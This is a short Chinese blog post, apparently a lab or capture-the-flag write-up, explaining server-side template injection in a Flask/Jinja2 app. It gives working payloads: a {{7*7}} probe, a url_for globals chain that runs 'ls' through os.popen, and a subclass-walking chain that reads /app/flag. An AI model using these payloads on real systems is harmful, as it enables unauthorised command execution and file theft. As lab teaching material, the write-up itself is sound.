首页 > 其他分享 >实验说明 - ssti

实验说明 - ssti

时间:2024-07-24 20:40:24浏览次数:7  
标签:__ .__ 步骤 __.__ 说明 ssti 实验

实验名称

简单的ssti

实验简介

是一种针对服务器端模板的注入漏洞。

实验说明

攻击者 将恶意代码输入到模板 服务器在执行时未对恶意代码进行处理 就输出执行

将字符串 当作模板执行

ssti注入就是使其渲染我们想要执行的的字符串

实验步骤

步骤一:

输入 {{7*7}}判断类型

image-20240724190317753

步骤二:

{{url_for.__globals__.__builtins__['__import__']('os').popen('ls').read()}}

image-20240724203119223

步骤三:

{{' '.__class__.__base__.__subclasses__()[133].__init__.__globals__['popen']('cat /app/flag').read()}}

image-20240724203344756

标签:__,.__,步骤,__.__,说明,ssti,实验
From: https://www.cnblogs.com/Yolololo/p/18321682

相关文章

  • Python数据分析与可视化大作业项目说明(含免费代码)
    题目:对全球和中国互联网用户的数据分析与可视化代码下载链接:https://download.csdn.net/download/s44359487yad/89574688一、项目概述1.1.项目背景:互联网是当今时代最重要和最有影响力的技术之一,它已经深刻地改变了人们的生活、工作、学习等方面。互联网用户数据是反映......
  • 【Python实战因果推断】45_因果实验设计1
    目录Geo-Experiments在前文你学习了如何利用一段时间内的重复观察来帮助进行因果推理。现在,在本文中,你将从另一个角度来探讨同样的问题。如果你不必使用面板数据来确定干预效应,而是要设计一个实验来收集这些数据,会怎么样呢?本部分专门讨论了在简单的A/B测试行不通时的替代......
  • 龙哥量化:通达信软件的公式编辑器专业财务函数说明专业财务函数介绍
      1专业财务函数介绍 “专业财务函数”主要通过FINVALUE|FINONE(指定报告期),GPJYVALUE|GPJYONE(指定日期),SCJYVALUE|SCJYONE(指定日期),BKJYVALUE|BKJYONE(指定日期),GPONEDAT,这9个函数来对个股的财务指标、个股的交易指标、市场的交易指标、板块的财务指标和个股的单个数......
  • 超声波清洗机洗0.5mm碳纤维丝和进行石墨烯碳纤维的复合实验
       很高兴现在超声波清洗机在各行各业的普及率越来越高,尤其是很多实验室都离不开超声波清洗机的辅助,超声波清洗机切切实实的帮助解决了很多实验的困扰,简化了实验过程。最近有一位研究生客户咨询实验室超声波清洗机,主要是清洗0.5mm碳纤维丝上的微小颗粒和进行石墨烯与碳......
  • servlet化学实验交流平台-计算机毕业设计源码13069
    目录摘要Abstract第一章绪论1.1选题背景及意义1.2国内外研究现状1.3研究方法第二章相关技术介绍2.1Java编程语言2.2B/S模式2.3MySQL简介2.4Serrvlet框架2.5Vue介绍第三章化学实验交流平台分析3.1系统目标3.2可行性分析3.2.1技术......
  • NAT实验
    目录一 实验目的二 设备连接结构图三 实验环境四 实现方法概述五 实验结果一 实验目的为各主机及路由器的个端口配置IP地址实现内网中的所有192.168.1.0网段与200.0.02之间的ping通熟悉NAT的配置查看NAT地址转换表二 设备连接结构图三 实验环境......
  • 数据结构实验二——单链表的基本操作(2021级zzu)
    ps:滴~打卡第二天,好困啊~~~~~~数据结构实验二——单链表的基本操作一、实验目的二、实验内容(选其中之一写实验报告)三、问题描述四、数据结构定义五、算法思想及算法设计5.1实验内容(1)5.1.1理论实现和代码实现5.2实验内容(2)5.2.1代码实现六、运行示例七、实验代......
  • 实战:OpenFeign使用以及易踩坑说明
    OpenFeign是SpringCloud中的重要组件,它是一种声明式的HTTP客户端。使用OpenFeign调用远程服务就像调用本地方法一样,但是如果使用不当,很容易踩到坑。Feign和OpenFeignFeignFeign是SpringCloud组件中的一个轻量级RESTful的HTTP服务客户端Feign内置了Ribbon,用来做客户端负载......
  • 数字量输入模块:功能与选型及安装说明
    Profinet远程IO模块:数字量输入模块_功能与选型及安装说明XD系列插片式远程I/O模块是兴达易控技术研发的分布式扩展模块。XD系列成套系统主要由耦合器、各种功能I/O模块、电源辅助模块以及终端模块组成。有多种通讯协议总线的耦合器,例如PROFINET、EtherCAT、Ethernet/IP、Cclink......
  • CTF-SSTI模板注入
    SSTI就是服务器端模板注入(Server-SideTemplateInjection)当前使用的一些框架,比如python的flask,php的tp,java的spring等一般都采用成熟的的MVC的模式,用户的输入先进入Controller控制器,然后根据请求类型和请求的指令发送给对应Model业务模型进行业务逻辑判断,数据库存取,最后把结......